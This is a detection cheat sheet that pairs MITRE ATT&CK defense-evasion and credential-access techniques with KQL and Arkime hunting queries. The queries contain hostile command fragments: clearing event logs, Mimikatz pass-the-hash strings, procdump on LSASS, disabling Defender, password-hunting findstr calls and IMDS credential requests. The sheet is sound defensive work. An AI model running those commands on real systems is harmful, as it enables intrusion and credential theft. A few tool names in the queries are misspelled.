bitsadmin AND (Transfer OR Create OR AddFile OR SetNotifyFlags OR SetNotifyCmdLine OR SetMinRetryDelay OR SetCustomHeaders OR Resume)
KQLPowerShell Start-BitsTransfer (evasion via trusted BITS mechanism)
process.name: powershell.exe AND process.command_line: *Start-BitsTransfer*
KQLBITS job lifecycle event IDs (requires Sysmon or BITS event log)
event.code: (59 OR 60 OR 61)
-- 59: BITS job created  60: BITS job updated  61: BITS job deleted
T1070.001

Indicator Removal: Clear Windows Event Logs

[MITRE]
Adversaries clear Windows event logs to remove evidence of their activity. Event ID 1102 is logged when the Security log is cleared โ€” itself an alert.
KQLSecurity audit log cleared (Ev1102) or log clear action
event.code: 1102 OR event.action: "Log clear"
KQLwevtutil clearing event logs via command line
process.name: wevtutil.exe AND process.command_line: (*clear-log* OR * cl * OR *set-log* OR * sl * OR *lfn*)
process.command_line: *wevutil cl*
-- Common: wevutil cl system  wevutil cl application  wevutil cl security
KQLPowerShell or WMI clearing event logs
process.name: (powershell.exe OR pwsh.exe) AND process.command_line: (*Clear-EventLog* OR *Clear-WinEvent*)
process.name: wmic.exe AND process.command_line: *ClearEventLog*
T1070.004

Indicator Removal: File Deletion

[MITRE]
Adversaries delete files to remove evidence of their activity โ€” malware, scripts, staging directories, or downloaded tools after use.
KQLSecure delete (sdelete) โ€” adversaries use this to make recovery difficult
process.name: (sdelete.exe OR sdelete64.exe)
KQLdel/rmdir or PowerShell Remove-Item used to delete suspicious files
process.name: (del.exe OR rmdir.exe)
process.name: powershell.exe AND process.command_line: *Remove-Item*
T1218.001

System Binary Proxy Execution: Compiled HTML File (HH.exe)

[MITRE]
Adversaries abuse HH.exe (HTML Help) to execute malicious .chm files, which can contain embedded scripts. This bypasses application whitelisting as HH.exe is a signed Microsoft binary.
KQLHH.exe loading a CHM file โ€” flag any CHM from unusual path or network
process.name: hh.exe AND process.command_line: *.chm*
T1218.011

System Binary Proxy Execution: Rundll32

[MITRE]
Adversaries use rundll32.exe to proxy execution of malicious DLLs or scripts (including JavaScript) to bypass application whitelisting. High volume of legitimate rundll32 makes detection noisy.
KQLRundll32 with Start export โ€” common malware execution pattern
process.name: rundll32.exe AND process.command_line: *Start*
KQLRundll32 executing JavaScript (alternate data stream or script abuse)
process.name: rundll32.exe AND process.command_line: *javascript*
KQLAny rundll32 execution โ€” high volume expected, filter by parent or path
process.name: rundll32.exe
-- Tune: exclude known-good paths (e.g., C:\Windows\System32\shell32.dll)
T1562.001

Impair Defenses: Disable or Modify Tools

[MITRE]
Adversaries disable or modify security tools (AV, EDR, Windows Defender, firewall) to avoid detection. Common methods include service stop commands, registry edits, and PowerShell cmdlets.
KQLPowerShell disabling Windows Defender script scanning or antispyware
process.command_line: *Set-MpPreference* AND process.command_line: *Disable*
process.name: powershell.exe AND process.command_line: *Set-ItemProperty* AND process.command_line: *DisableAntiSpyware*
KQLsc.exe stopping/configuring Windows Defender or Firewall services
event.code: 4688 AND process.name: sc.exe AND process.args: (config OR stop OR query)
KQLSecurity service stopped (Ev7036) โ€” Defender or Firewall service stopped
event.code: 7036 AND winlog.event_data.param1: ("Windows Defender*" OR "Windows Firewall*") AND winlog.event_data.param2: "stopped"
KQLDefender policy registry keys modified to disable protection
registry.path: ("HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows Defender*" OR "HKLM\\SOFTWARE\\Microsoft\\AMSI\\Providers*")
registry.path: *DisableAntiSpy*
KQLMpCmdRun reverting Defender platform definitions
process.name: MpCmdRun.exe AND process.command_line: *RevertPlatform*
T1564.001

Hide Artifacts: Hidden Files and Directories

[MITRE]
Adversaries set the hidden attribute on files and directories to conceal malicious tools or data from casual inspection by users or basic directory listings.
KQLreg.exe modifying ShowSuperHidden or Hidden attribute settings
process.name: reg.exe AND process.command_line: (*ShowSuperHidden* OR *Hidden*)
KQLRegistry paths containing hidden attribute configuration
registry.path: (*Hidden* OR *SuperHidden*)
T1574.001

Hijack Execution Flow: DLL Search Order Hijacking

[MITRE]
Adversaries plant malicious DLLs in locations searched before the legitimate DLL path, causing legitimate processes to load attacker code โ€” evading detection while running under a trusted process. (Also see Persistence and Privilege Escalation.)
KQLUntrusted/unsigned DLL loaded using commonly hijacked DLL names
(event.category: "library" OR (event.category: "process" AND event.action: "Image loaded*")) AND
(dll.name: ("wlbsctrl.dll" OR "wbemcomn.dll" OR "WptsExtensions.dll" OR "wow64log.dll" OR
            "WindowsCoreDeviceInfo.dll" OR "Ualapi.dll" OR "wlanhlp.dll" OR "phoneinfo.dll" OR
            "EdgeGdi.dll" OR "cdpsgshims.dll" OR "diagtrack_win.dll") AND
 (dll.code_signature.trusted: false OR dll.code_signature.exists: false))
T1548

Abuse Elevation Control Mechanism

[MITRE]
Adversaries bypass UAC silently using auto-elevating trusted binaries (fodhelper.exe, computerdefaults.exe) to execute payloads without triggering a user prompt โ€” preventing the user and behavioral analytics from detecting unauthorized admin actions.
KQLSysmon โ€” UAC bypass binaries spawning interpreters
process.parent.name: ("fodhelper.exe" OR "computerdefaults.exe" OR "sdclt.exe" OR "slui.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "rundll32.exe")
T1134

Access Token Manipulation (Defense Evasion)

[MITRE]
Adversaries evade identity-based detections by adopting another logged-on user's access token โ€” making malicious actions appear to come from a legitimate administrator in audit logs.
KQLWindows โ€” Logon Type 9 for network-only token impersonation
winlog.event_id: 4624 AND winlog.logon.type: 9 AND event.outcome: "success"
T1612

Build Image on Host

[MITRE]
Adversaries build malicious container images directly on compromised production hosts using docker build, bypassing central registry scanners since the image never passes through the organization's registry.
KQLLinux โ€” container image builds on production nodes (not build runners)
process.name: ("docker" OR "buildah" OR "podman") AND process.command_line: "* build *" AND NOT host.hostname: "*build-runner*"
T1622

Debugger Evasion

[MITRE]
Adversaries check if malware is running inside a debugger, sandbox, or EDR emulator (using IsDebuggerPresent, timing checks, or looking for analysis tools) โ€” if detected, malware stops executing to evade detection and analysis.
KQLSysmon โ€” processes reading memory of known analysis tools
winlog.event_id: 10 AND winlog.event_data.TargetImage: ("*\\wireshark.exe" OR "*\\sysmon.exe" OR "*\\x64dbg.exe")
T1678

Delay Execution

[MITRE]
Adversaries program malware to sleep for 10+ minutes to outlast automated sandbox analysis (which typically runs 3-5 minutes) โ€” the sandbox marks it clean, then malware executes on the real endpoint.
KQLSysmon โ€” ping localhost used as a delay loop
process.name: "ping.exe" AND process.command_line: ("*-n 60*" OR "*-n 100*") AND process.command_line: ("*127.0.0.1*" OR "*localhost*")
T1610

Deploy Container (Defense Evasion)

[MITRE]
Adversaries deploy privileged containers to evade host-based EDR visibility โ€” an EDR on the host OS may not have visibility into processes executing inside an isolated Docker container.
KQLLinux โ€” containers deployed with --privileged or host filesystem mounted
process.name: "docker" AND process.command_line: "* run *" AND process.command_line: ("*--privileged*" OR "*--net=host*" OR "*-v /:*")
T1006

Direct Volume Access

[MITRE]
Adversaries read raw disk sectors (\\.\C:) to bypass OS file locking and copy locked files like NTDS.dit or SAM โ€” completely evading file-access auditing since they bypass the OS file API.
KQLSysmon โ€” VSS creation to access locked credential files
process.name: "vssadmin.exe" AND process.command_line: ("* create shadow *" OR "*ntds.dit*")
KQLSysmon โ€” raw disk access (Event ID 9)
winlog.event_id: 9 AND winlog.event_data.Device: "\\Device\\HarddiskVolume*"
T1484

Domain or Tenant Policy Modification (Defense Evasion)

[MITRE]
Adversaries modify GPOs to add Defender exclusions for malware paths across all workstations, or disable Azure AD Conditional Access policies โ€” degrading defenses at enterprise scale with a single change.
KQLWindows โ€” GPO modifications targeting security extension names
winlog.event_id: 5136 AND winlog.event_data.ObjectClass: "groupPolicyContainer" AND winlog.event_data.AttributeLDAPDisplayName: "gPCMachineExtensionNames"
T1672

Email Spoofing

[MITRE]
Adversaries forge sender addresses to evade email gateways, abusing missing or misconfigured SPF/DKIM/DMARC to make emails appear to come from the CEO or IT Support.
KQLO365 โ€” internal domain emails failing SPF/DMARC
event.dataset: "o365.message_trace" AND source.domain: "yourcompany.com" AND (email.auth.spf.status: "fail" OR email.auth.dmarc.status: "fail")
T1480

Execution Guardrails

[MITRE]
Adversaries compile malware to only decrypt/execute if specific environmental conditions match the target (domain name, MAC OUI, SID). If analyzed in a sandbox with wrong conditions, malware exits cleanly โ€” appearing benign to vendors.
KQLSysmon โ€” reconnaissance commands before payload execution (guardrail checks)
process.name: ("whoami.exe" OR "nltest.exe" OR "ipconfig.exe") AND process.parent.name: ("WINWORD.EXE" OR "EXCEL.EXE" OR "AcroRd32.exe")
T1211

Exploitation for Defense Evasion

[MITRE]
Adversaries exploit vulnerabilities in security software (AV, EDR, firewalls) specifically to crash the tool, blind the SIEM, or execute malware under the trusted security vendor process context.
KQLSysmon โ€” security software spawning anomalous child processes (exploit)
process.parent.name: ("MsMpEng.exe" OR "csfalcon.exe" OR "TaniumClient.exe" OR "cb.exe") AND process.name: ("cmd.exe" OR "powershell.exe" OR "whoami.exe")
T1222

File and Directory Permissions Modification

[MITRE]
Adversaries modify ACLs to lock defenders out of malware storage directories, or loosen permissions on restricted system files โ€” using icacls, takeown, chmod, or chattr.
KQLSysmon โ€” icacls granting Everyone full control
process.name: ("icacls.exe" OR "takeown.exe") AND process.command_line: ("*/grant Everyone:F*" OR "*/f *")
KQLLinux โ€” chmod/chown on /etc/shadow or /etc/passwd
process.name: ("chmod" OR "chown") AND process.command_line: ("* /etc/shadow*" OR "* /etc/passwd*")
T1656

Impersonation

[MITRE]
Adversaries impersonate trusted persons or entities โ€” renaming malicious processes to match usernames, or spoofing administrator identity โ€” to trick analysts or automated systems into trusting the action.
KQLWindows โ€” explicit credential use (runas) impersonating admin accounts
winlog.event_id: 4648 AND process.name: "runas.exe" AND winlog.event_data.TargetUserName: ("Administrator" OR "*admin*")
T1202

Indirect Command Execution

[MITRE]
Instead of running cmd.exe directly, adversaries use built-in Windows utilities (pcalua.exe, forfiles.exe, bash.exe via WSL) to proxy execution โ€” breaking parent-child process chains and bypassing AppLocker.
KQLSysmon โ€” built-in Windows binaries used to proxy command execution
process.name: ("pcalua.exe" OR "forfiles.exe" OR "syncappvpublishingserver.exe") AND process.command_line: ("*-a*" OR "*/c*" OR "*cmd.exe*")
T1556

Modify Authentication Process (Defense Evasion)

[MITRE]
Adversaries modify authentication binaries to prevent the system from logging failed authentication attempts, blinding the SIEM to brute force or lateral movement activity.
KQLSysmon Registry โ€” malicious SSP/auth package added to LSA
winlog.event_id: (12 OR 13) AND registry.path: "*\\System\\CurrentControlSet\\Control\\Lsa\\Authentication Packages*"
T1578

Modify Cloud Compute Infrastructure

[MITRE]
Adversaries disable VPC Flow Logs, modify Security Groups to allow inbound C2, or alter routing tables to hide network traffic and enable access from the internet without detection.
KQLCloudTrail โ€” AWS network monitoring/logging deletion
event.dataset: "aws.cloudtrail" AND event.action: ("DeleteFlowLogs" OR "StopLogging" OR "DeleteTrail")
KQLAzure โ€” NSG security rule writes
event.dataset: "azure.activitylogs" AND event.action: "Microsoft.Network/networkSecurityGroups/securityRules/write"
T1666

Modify Cloud Resource Hierarchy

[MITRE]
Adversaries detach a compromised cloud subscription from its parent organization, instantly dropping all inherited security controls and logging โ€” blinding the SOC to that account's activity.
KQLCloudTrail/Azure โ€” accounts removed from central management orgs
(event.dataset: "aws.cloudtrail" AND event.action: "RemoveAccountFromOrganization") OR (event.dataset: "azure.activitylogs" AND event.action: "Microsoft.Management/managementGroups/subscriptions/delete")
T1601

Modify System Image

[MITRE]
Adversaries modify the firmware/system image of network appliances (Cisco, Fortinet, F5) โ€” appliances that can't run standard EDR โ€” providing a completely undetectable haven to sniff traffic or maintain persistence.
KQLNetwork device syslog โ€” firmware image copy/update commands from untrusted sources
event.dataset: ("cisco.ios" OR "fortinet.firewall") AND message: ("*copy tftp flash*" OR "*execute restore image*") AND NOT source.ip: "10.0.x.x"
T1647

Plist File Modification

[MITRE]
On macOS, adversaries modify .plist files to hide applications from the Dock, prevent them from appearing in Force Quit, or inject malicious DYLD_INSERT_LIBRARIES environment variables to hook legitimate apps.
KQLmacOS โ€” defaults write modifying LSUIElement or LSEnvironment keys
process.name: ("defaults" OR "plutil") AND process.command_line: ("* write * LSUIElement *" OR "* write * LSEnvironment *")
T1542

Pre-OS Boot (Defense Evasion)

[MITRE]
UEFI/Bootkit implants execute before the OS and its security tools load โ€” actively patching the OS kernel in memory to blind EDR tools and hide processes and network connections from the OS itself.
KQLSysmon โ€” BIOS/UEFI firmware flashing utilities executed
process.name: ("afuwin64.exe" OR "fptw64.exe" OR "fwupdlocal.exe")
T1620

Reflective Code Loading

[MITRE]
Adversaries load compiled malware directly into memory from scripts (fileless malware) using PowerShell Reflection APIs โ€” no file ever hits disk, bypassing file-based AV scanning entirely.
KQLPS Script Block โ€” .NET Reflection loading binaries into memory
winlog.event_id: 4104 AND powershell.file.script_block_text: ("*[System.Reflection.Assembly]::Load*" OR "*[Reflection.Assembly]::Load*")
T1207

Rogue Domain Controller

[MITRE]
Adversaries use DCShadow/DCSync to register a compromised workstation as a fake DC, enabling hash extraction of any user or AD backdoor injection using legitimate replication protocols โ€” bypassing normal auth logs.
KQLWindows โ€” non-DC account requesting AD replication (DCSync)
winlog.event_id: 4662 AND winlog.event_data.Properties: ("*1131f6aa-9c07-11d1-f79f-00c04fc2dcd2*" OR "*1131f6ad-9c07-11d1-f79f-00c04fc2dcd2*") AND NOT user.name: "*$"
ArkimeDRSUAPI replication traffic from non-DC workstations
dcerpc.opnum == 3 AND NOT ip.src == 10.0.0.0/24
T1014

Rootkit

[MITRE]
Rootkits operate at kernel level (Ring 0), hooking OS APIs like NtQuerySystemInformation to actively hide the adversary's processes and files from Task Manager and EDR โ€” making them completely invisible to the OS.
KQLSysmon โ€” suspicious .sys drivers loaded from user-writable paths
winlog.event_id: 6 AND file.path: ("*\\Temp\\*.sys" OR "*\\AppData\\*.sys" OR "*\\Users\\Public\\*.sys")
T1679

Selective Exclusion

[MITRE]
Instead of disabling AV entirely (which generates massive alerts), adversaries add a targeted exclusion for only the folder where their malware lives โ€” the AV keeps running but ignores the payload.
KQLSysmon โ€” Add-MpPreference adding exclusion path/process/extension
process.name: ("powershell.exe" OR "cmd.exe") AND process.command_line: ("*Add-MpPreference -ExclusionPath*" OR "*Add-MpPreference -ExclusionProcess*" OR "*Add-MpPreference -ExclusionExtension*")
T1553

Subvert Trust Controls

[MITRE]
Adversaries steal legitimate code-signing certificates, modify SIP to make unsigned files appear signed, or install malicious root certificates so the OS inherently trusts their malware.
KQLSysmon โ€” certutil adding certs to Root or TrustedPublisher store
process.name: "certutil.exe" AND process.command_line: ("*-addstore*" OR "*-importpfx*") AND process.command_line: ("*Root*" OR "*TrustedPublisher*")
T1216

System Script Proxy Execution

[MITRE]
Adversaries use default signed Windows scripts (pubprn.vbs, slmgr.vbs, manage-bde.wsf) with crafted arguments to proxy malicious payload execution โ€” bypassing script execution restrictions because the scripts are Microsoft-signed.
KQLSysmon โ€” pubprn.vbs abused to execute remote payload
process.name: ("wscript.exe" OR "cscript.exe") AND process.command_line: "*pubprn.vbs 127.0.0.1 script:http*"
T1221

Template Injection

[MITRE]
Adversaries send harmless-looking .docx files (no macros, bypassing email gateways) that on open dynamically fetch a malicious macro-enabled template (.dotm) from the internet.
KQLSysmon โ€” Word/Excel making outbound network connections upon document open
winlog.event_id: 3 AND process.name: ("WINWORD.EXE" OR "EXCEL.EXE") AND network.direction: "outbound" AND destination.port: (80 OR 443 OR 445) AND NOT destination.ip: ("10.0.0.0/8" OR "192.168.0.0/16")
ArkimeHTTP download of .dotm macro-enabled Office templates
http.request.uri matches "\.dotm$" OR http.response.headers.content_type contains "application/vnd.ms-word.template.macroEnabled"
T1205

Traffic Signaling (Defense Evasion)

[MITRE]
Port Knocking keeps the C2 port completely closed (evading Shodan and vulnerability scanners) โ€” only opening temporarily when a specific secret packet sequence is received from the adversary.
KQLLinux โ€” raw packet sniffers run by non-admin (waiting for knock sequence)
process.name: ("tcpdump" OR "bpftool" OR "snort") AND NOT user.name: "root"
T1127

Trusted Developer Utilities Proxy Execution

[MITRE]
Adversaries abuse MSBuild.exe, csc.exe, or jsc.exe to compile C#/.NET payloads directly in memory โ€” bypassing static AV checks because the source code is compiled locally and never written to disk as an executable.
KQLSysmon โ€” MSBuild compiling from user-writable or temp folders
process.name: ("MSBuild.exe" OR "csc.exe" OR "jsc.exe") AND process.command_line: ("*\\AppData\\*" OR "*\\Temp\\*" OR "*\\Users\\Public\\*")
T1535

Unused/Unsupported Cloud Regions

[MITRE]
Adversaries spin up rogue cloud infrastructure in regions the organization never uses โ€” invisible to SOC dashboards filtered to primary regions like us-east-1 โ€” enabling weeks of undetected activity.
KQLCloudTrail โ€” infrastructure creation in non-standard AWS regions
event.dataset: "aws.cloudtrail" AND event.action: ("RunInstances" OR "CreateVpc") AND NOT aws.region: ("us-east-1" OR "us-east-2" OR "us-west-1" OR "us-west-2")
T1550

Use Alternate Authentication Material (Defense Evasion)

[MITRE]
Adversaries bypass MFA and password resets using stolen NTLM hashes (Pass-the-Hash), Kerberos tickets (Pass-the-Ticket), or web session cookies โ€” authenticating without knowing the plaintext password.
KQLWindows โ€” Pass-the-Hash indicator (Logon Type 9 + seclogo process)
winlog.event_id: 4624 AND winlog.logon.type: 9 AND winlog.event_data.LogonProcessName: "seclogo"
KQLSysmon โ€” Mimikatz PtH/PtT command line indicators
process.command_line: "*sekurlsa::pth*" OR process.command_line: "*kerberos::ptt*"
T1078

Valid Accounts (Defense Evasion)

[MITRE]
Using a valid account is the ultimate defense evasion โ€” logging in as the IT Director looks exactly like the IT Director working from home. No exploits, no malware, no alerts. Look for behavioral anomalies instead.
KQLWindows โ€” service accounts logging in interactively (behavioral anomaly)
winlog.event_id: 4624 AND winlog.logon.type: (2 OR 10) AND user.name: ("svc_*" OR "*_svc")
T1497

Virtualization/Sandbox Evasion

[MITRE]
Adversaries check WMI BIOS data, disk size (<60GB), MAC OUI (VMware/VirtualBox prefixes), or running analysis tool processes โ€” if sandbox detected, malware exits cleanly and appears benign to the analyst.
KQLSysmon โ€” WMI queries for hardware metrics (sandbox detection checks)
process.name: "wmic.exe" AND process.command_line: ("*computersystem get*" OR "*bios get*" OR "*memorychip*")
T1600

Weaken Encryption

[MITRE]
Adversaries downgrade network encryption (forcing NTLMv1 instead of NTLMv2, or enabling SMBv1) to enable successful Man-in-the-Middle attacks and password cracking on the local network.
KQLSysmon Registry โ€” LmCompatibilityLevel modification (NTLMv1 downgrade)
winlog.event_id: (12 OR 13) AND registry.path: "*\\System\\CurrentControlSet\\Control\\Lsa\\LmCompatibilityLevel"
T1220

XSL Script Processing

[MITRE]
Adversaries abuse wmic.exe or msxsl.exe to execute malicious XSL files containing embedded JScript/VBScript โ€” bypassing Application Whitelisting since wmic.exe is a trusted Microsoft binary.
KQLSysmon โ€” wmic executing a remote internet-hosted XSL stylesheet
process.name: "wmic.exe" AND process.command_line: ("*/format:http://*" OR "*/format:https://*")
Credential Access TA0006
Techniques for stealing account names and passwords. Credentials allow adversaries to access systems, move laterally, and enable persistence mechanisms.
T1003

OS Credential Dumping

[MITRE]

Why they do it: Adversaries attempt to dump credentials from LSASS, SAM, or NTDS to obtain account login material (hashes or clear text passwords).

KQLLSASS dump file creation (not from werfault โ€” suspicious)
file_name: "lsass*.dmp" AND NOT process_name: "werfault.exe"
process.name: prodump.exe AND process.command_line: *lsass.exe*
KQLMimikatz and credential dumping tools
process.name: mimikatz.exe AND process.command_line: *sekurlsa* AND process.command_line: (*minidump* OR *logonPasswords*)
process.name: rundll32.exe AND process.command_line: *comsvcs.dll*
process.name: rundll32.exe AND process.command_line: *Minidump*
KQLSuspicious LSASS parent/child process relationships
process.name: lsass.exe AND process.parent.name: (explorer.exe OR cmd.exe OR lsass.exe)
process.parent.name: lsass.exe AND process.name: (cmd.exe OR powershell.exe OR regsvr32.exe OR mstsc.exe OR dllhost.exe)
KQLWDigest registry modification โ€” forces cleartext passwords in memory
event.type: ("creation" OR "change") AND registry.path: "HKLM\\SYSTEM\\*ControlSet*\\Control\\SecurityProviders\\WDigest\\UseLogonCredential" AND registry.data.strings: "1"
KQLT1003.003 NTDS โ€” dumping Active Directory credentials
process.command_line: *NTDS.dit*
process.name: (ntdsutil.exe OR secretsdump.py OR vssadmin.exe OR wmic.exe)
event.code: 4688 AND process.name: ("mimikatz.exe" OR "procdump.exe" OR "ntdsutil.exe" OR "powershell.exe") AND process.command_line: (*Invoke* AND (*Mimikatz* OR *CachedCredentials* OR *LSADump* OR *SAMDump*))
KQLSAM registry key access by suspicious processes
event.code: 4663 AND process.name: ("mimikatz.exe" OR "procdump.exe" OR "reg.exe" OR "powershell.exe" OR "wmic.exe" OR "schtasks.exe" OR "cmd.exe") AND process.args: "\SAM"
KQLProcdump capturing LSASS (event 4688)
event.code: 4688 AND process.name: procdump.exe AND process.command_line: (*-ma* AND *lsass*)
KQLUnauthorized access to credential storage files
event.code: 4663 AND process.args: (*\config\SAM* OR *\ntds.dit* OR *\policy\secrets* OR *\cache*)
T1110

Brute Force

[MITRE]
KQLLogon failure frequency analysis โ€” brute force detection
event.code: (4625 OR 4776 OR 5379 OR 530 OR 533 OR 7038)
  4625: Failed logon | 4776: Local auth attempt | 5379: Credential manager read
  530: Logon outside allowed hours | 533: User not authorized on this machine
KQLKnown brute force tools
hashcat.exe OR hydra OR crackmapexec OR poshC2 OR medusa OR ncrack OR patator OR john OR w3af
nmap AND brute
KQLT1110.004 Credential Stuffing โ€” many failed auth attempts across accounts
event.code: (4625 OR 5379)
kerbrute.exe
sshpass
T1212

Exploitation for Credential Access

[MITRE]
KQLKerberos manipulation โ€” determine if authorized pentesting or sysadmin activity
event.code: (4768 OR 4769 OR 4771 OR 675)
KQLCoercion of local NTLM auth via HTTP (Printer Spooler / DavSetCookie)
event.type: ("start" OR "process_started") AND process.name: "rundll32.exe" AND process.args: ("?:\\Windows\\System32\\davclnt.dll,DavSetCookie" OR "?:\\Windows\\SysWOW64\\davclnt.dll,DavSetCookie") AND process.args: ("http*/print/pipe/*" OR "http*/pipe/spoolss" OR "http*/pipe/srvsvc")
T1552

Unsecured Credentials

[MITRE]
KQLCMD/PowerShell reading text/config files (credential search)
process.name: (cmd.exe OR powershell.exe) AND event.code: (1 OR 5 OR 7 OR 11) AND event.action: (Read OR Write) AND file.path: (*.txt OR *.xml OR *.json OR *.csv)
KQLPowerShell searching for credential keywords (event 4104)
event.code: 4104 AND powershell.file.script_block_text: (*password* OR *credential* OR *secret* OR *token* OR *passwd* OR *passphrase*)
KQLfindstr hunting for passwords in files
"findstr /si password"
"findstr /si pass"
T1555

Credentials from Password Stores

[MITRE]
KQLKeePass or LastPass accessed with credential file patterns
process.name: ("keepass.exe" OR "lastpass.exe") AND (file.path: /%appdata%\.*\.kdbx/ OR file.path: /%systemroot%\system32\credmgr.exe/)
KQLBrowser accessing credential/cookie database files
process.name: ("chrome.exe" OR "firefox.exe" OR "msedge.exe" OR "iexplore.exe" OR "brave.exe") AND file.path: ("*.sqlite" OR "*.logins.json" OR "*.key3.db" OR "*.signons.sqlite" OR "*.signons3.txt")
InfoAlso search Kibana for unauthorized access to SAM, NTDS.dit, LSASS. For Linux: /etc/passwd and /etc/shadow access.
Windows: LSASS process access, SAM registry, NTDS.dit file access
Linux: /etc/passwd, /etc/shadow
Use event.code: 4663 with ObjectName containing SAM or NTDS.dit
T1003.003

OS Credential Dumping: NTDS

[MITRE]
Adversaries dump the NTDS.dit Active Directory database to extract all domain password hashes. Requires DC access. Common tools: ntdsutil, secretsdump, vssadmin (VSS snapshot), wmic.
KQLNTDS.dit referenced in command line or process args
process.command_line: *NTDS.dit*
process.name: (ntdsutil.exe OR vssadmin.exe OR wmic.exe)
KQLSuspicious credential dump tool execution
event.code: 4688 AND process.name: ("mimikatz.exe" OR "procdump.exe" OR "ntdsutil.exe" OR "powershell.exe") AND process.command_line: (*Invoke-Mimikatz* OR *LSADump* OR *SAMDump*)
KQLReplication requests to DC โ€” DCSync attack indicator (Ev4662 with DS-Replication GUIDs)
event.code: 4662 AND winlog.event_data.AccessMask: "0x100" AND winlog.event_data.Properties: (
  "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2" OR
  "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2" OR
  "9923a32a-3607-11d2-b9be-0000f87a36b2" OR
  "89e95b76-444d-4c62-991a-0facbeda640c"
)
KQLprocdump targeting lsass (also pulls domain creds from memory)
event.code: 4688 AND process.name: procdump.exe AND process.command_line: (*-ma* AND *lsass*)
KQLAccess to SAM or NTDS.dit credential storage files
event.code: 4663 AND process.name: ("mimikatz.exe" OR "procdump.exe" OR "reg.exe" OR "powershell.exe" OR "wmic.exe") AND process.args: ("\SAM" OR "ntds.dit")
T1110.004

Brute Force: Credential Stuffing

[MITRE]
Adversaries use credentials from previous data breaches (username/password combos) against services. Unlike password spraying, credential stuffing uses real credentials from breached databases.
KQLMultiple failed authentications across various accounts (Ev4625)
event.code: (4625 OR 5379)
-- High volume of 4625 across many different user accounts = credential stuffing
-- 5379: Credential Manager credentials read
KQLKerbrute tool usage (credential stuffing via Kerberos)
process.name: kerbrute.exe
KQLsshpass on Linux (credential stuffing via SSH)
process.name: sshpass
T1557

Adversary-in-the-Middle

[MITRE]
Adversaries intercept traffic (ARP spoofing, LLMNR/NBT-NS poisoning via Responder/Inveigh) to capture NTLMv2 hashes or relay authentication when machines look for non-existent file shares.
KQLSysmon โ€” unexpected processes binding to name resolution ports (Responder)
winlog.event_id: 3 AND network.direction: "inbound" AND destination.port: (137 OR 5355 OR 53) AND NOT process.name: ("svchost.exe" OR "System")
ArkimeLLMNR/NBT-NS poisoning โ€” high volume of name responses from single workstation
udp.port == 5355 OR udp.port == 137
T1187

Forced Authentication

[MITRE]
Adversaries drop malicious .LNK or .SCF files on shared drives โ€” when a user opens the folder, Windows auto-fetches the icon from the adversary's server, handing over the NTLMv2 hash without any user interaction.
KQLSysmon โ€” outbound SMB connections leaving the corporate network
winlog.event_id: 3 AND destination.port: (445 OR 139) AND NOT destination.ip: ("10.0.0.0/8" OR "192.168.0.0/16" OR "172.16.0.0/12")
ArkimeSMB NTLM auth leaving perimeter
smb.cmd == 0x73 AND ip.dst != 10.0.0.0/8
T1606

Forge Web Credentials

[MITRE]
Adversaries compromise ADFS or steal token-signing certificates to forge Golden SAML tokens โ€” generating valid login tokens for any user, bypassing passwords, MFA, and Conditional Access for O365/AWS.
KQLWindows โ€” ADFS DKM master key extraction (required to forge SAML)
winlog.event_id: 4662 AND winlog.event_data.ObjectName: "*ADFS\\Policy Store*" AND winlog.event_data.AccessMask: "0x100"
T1056

Input Capture

[MITRE]
Adversaries use keyloggers (GetAsyncKeyState, SetWindowsHookEx), clipboard monitors, or web form grabbers to capture credentials as the user types โ€” bypassing encrypted password vaults by stealing passwords before they're stored.
KQLSysmon โ€” processes making API calls associated with keylogging/hooking
winlog.event_id: 10 AND winlog.event_data.CallTrace: ("*GetAsyncKeyState*" OR "*SetWindowsHookEx*") AND NOT process.executable: "*\\Antivirus.exe"
T1556

Modify Authentication Process (Credential Access)

[MITRE]
Adversaries inject into the authentication process (Skeleton Key in lsass.exe, PAM backdoor on Linux) to capture plaintext passwords of every user who authenticates to the Domain Controller.
KQLSysmon โ€” unsigned/untrusted DLLs injected into lsass.exe
winlog.event_id: 7 AND process.name: "lsass.exe" AND NOT file.path: "*\\Windows\\System32\\*" AND file.extension: "dll"
T1111

MFA Interception

[MITRE]
Adversaries bypass MFA via SIM swapping, SS7 network exploitation to intercept SMS codes, or AiTM phishing proxies (Evilginx2) that capture authenticated session cookies after the user completes the MFA challenge.
KQLAzure AD โ€” successful logins where session token appears from different IP (Impossible Travel)
event.dataset: "azure.auditlogs" AND event.action: "User logged in" AND event.outcome: "success"
T1621

MFA Request Generation

[MITRE]
MFA Fatigue / Prompt Bombing โ€” adversaries spam a user with dozens of MFA push notifications late at night until the user clicks Approve just to make their phone stop buzzing, bypassing MFA without exploiting any vulnerability.
KQLOkta/Azure โ€” multiple failed/denied MFA pushes for same user in short window
event.dataset: ("okta.system" OR "azure.auditlogs") AND event.action: ("user.mfa.attempt_bypass" OR "Authentication failed") AND event.reason: "*denied*" | stats count by user.name | where count > 5
T1040

Network Sniffing

[MITRE]
Adversaries capture network traffic to steal cleartext credentials (Telnet, FTP, HTTP) or NTLMv2 challenge-response packets for offline cracking using Hashcat โ€” placing NIC into Promiscuous Mode or running tcpdump/tshark.
KQLSysmon/Auditbeat โ€” network sniffing utilities run by non-admin users
process.name: ("tcpdump" OR "tshark" OR "wireshark.exe" OR "pktmon.exe") AND NOT user.name: ("root" OR "SYSTEM")
ArkimeCleartext credentials traversing the network
http.authbasic OR ftp.request.command == "USER" OR ftp.request.command == "PASS"
T1528

Steal Application Access Token

[MITRE]
Adversaries compromise VMs and curl the cloud Instance Metadata Service (IMDS at 169.254.169.254) to steal temporary IAM role tokens โ€” then use them from their own machine to access cloud storage or databases.
KQLSysmon/Auditbeat โ€” non-standard processes querying cloud IMDS
network.direction: "outbound" AND destination.ip: "169.254.169.254" AND process.name: ("curl" OR "wget" OR "powershell.exe" OR "cmd.exe")
ArkimeHTTP GET requests for IAM security credentials from IMDS
http.request.uri contains "/latest/meta-data/iam/security-credentials/"
T1539

Steal Web Session Cookie

[MITRE]
Adversaries steal browser session cookies (SQLite databases) and import them into their own browser, instantly inheriting an authenticated O365/AWS session โ€” completely bypassing passwords and MFA.
KQLSysmon โ€” scripts/tools accessing Chrome cookie databases
process.name: ("powershell.exe" OR "cmd.exe" OR "python.exe") AND process.command_line: ("*\\AppData\\Local\\Google\\Chrome\\User Data\\*\\Network\\Cookies*")
T1649

Steal or Forge Authentication Certificates

[MITRE]
